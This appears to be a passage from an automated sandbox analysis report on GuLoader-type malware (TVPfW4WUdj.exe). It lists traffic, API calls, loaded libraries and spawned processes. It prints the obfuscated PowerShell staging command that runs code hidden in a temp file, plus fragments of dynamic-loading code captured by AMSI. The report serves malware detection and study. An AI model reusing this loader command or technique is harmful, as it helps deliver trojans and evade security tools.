      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49781 version: TLS 1.2
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exeJump to dropped file
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00404C680_2_00404C68
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_0040698E0_2_0040698E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AAC35E2_2_07AAC35E
      Source: TVPfW4WUdj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeFile created: C:\Users\user\AppData\Roaming\luminancesJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB56D.tmpJump to behavior
      Source: TVPfW4WUdj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: TVPfW4WUdj.exeVirustotal: Detection: 70%
      Source: TVPfW4WUdj.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeFile read: C:\Users\user\Desktop\TVPfW4WUdj.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\TVPfW4WUdj.exe "C:\Users\user\Desktop\TVPfW4WUdj.exe"
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: TVPfW4WUdj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdbk source: powershell.exe, 00000002.00000002.1779505501.0000000008B12000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Rumraket $Sigtelinjers $Sulter), (Flashbackets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anledningernes = [AppDomain]::CurrentDomain.GetAssemblies()$
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mulse)), $Licencee).DefineDynamicModule($Lrerflugt, $false).DefineType($Sypigernes, $Majoriserendes, [System.MulticastDelegate])$ambon
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AA0FC4 push es; iretd 2_2_07AA0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_098139C1 push 8BD38B50h; iretd 2_2_098139C6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
